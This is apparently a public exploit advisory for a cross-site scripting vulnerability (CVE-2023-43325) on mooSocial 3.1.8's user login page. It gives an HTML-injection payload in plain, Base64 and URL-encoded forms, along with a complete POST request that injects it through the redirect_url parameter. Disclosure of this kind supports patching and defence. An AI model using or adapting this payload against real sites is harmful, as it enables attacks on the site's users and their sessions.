# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page # Date: 26 September 2023 # Exploit Author: Astik Rawat (ahrixia) # Vendor Homepage: https://moosocial.com # Software Link: https://travel.moosocial.com/ # Version: 3.1.8 # Tested on: Windows 11 # CVE : CVE-2023-43325 Description: A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website. Steps to exploit: 1) Go to Login page on the website and login with credentials. 2) Insert your payload in the "data[redirect_url]" - POST Request Proof of concept (Poc): The following payload will allow you to execute XSS - Payload (Plain text): test"><img src=a onerror=alert(1)>test Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q= Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): [_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]